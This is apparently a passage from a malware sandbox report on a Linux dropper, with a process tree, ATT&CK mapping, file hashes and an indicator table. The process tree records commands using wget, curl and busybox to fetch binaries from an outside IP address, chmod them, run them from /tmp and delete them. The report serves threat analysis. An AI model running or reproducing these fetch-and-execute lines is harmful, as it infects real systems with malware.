  chmod 777 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - File and Directory Permissions Modification
  PID:1660
- /tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  ./57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Executes dropped EXE
  PID:1661
- /bin/rm
  rm 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:1662
- /usr/bin/wget
  wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:1663
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Writes file to tmp directory
  PID:1664
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:1665
- /bin/chmod
  chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - File and Directory Permissions Modification
  PID:1666
- /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  ./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Executes dropped EXE
  PID:1667
- /bin/rm
  rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:1668
- /usr/bin/wget
  wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:1669
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Writes file to tmp directory
  PID:1670
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:1671
- /bin/chmod
  chmod 777 evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - File and Directory Permissions Modification
  PID:1672
- /tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  ./evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Executes dropped EXE
  PID:1673
- /bin/rm
  rm evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:1674
- /usr/bin/wget
  wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:1675
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Writes file to tmp directory
  PID:1676
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:1677
- /bin/chmod
  chmod 777 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - File and Directory Permissions Modification
  PID:1678
- /tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  ./8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Executes dropped EXE
  PID:1679
- /bin/rm
  rm 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:1680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	1515	BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	1521	evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	1527	8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	1533	57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	1539	K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	1545	n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	1551	de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	1557	YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	1563	NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	1569	WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	1575	bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	1581	VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	1587	SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	1593	cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	1599	NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	1605	WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	1611	K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	1617	n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	1623	de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	1629	YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	1637	bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	1643	VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	1649	SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	1655	cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	1661	57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	1667	BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	1673	evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	1679	8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju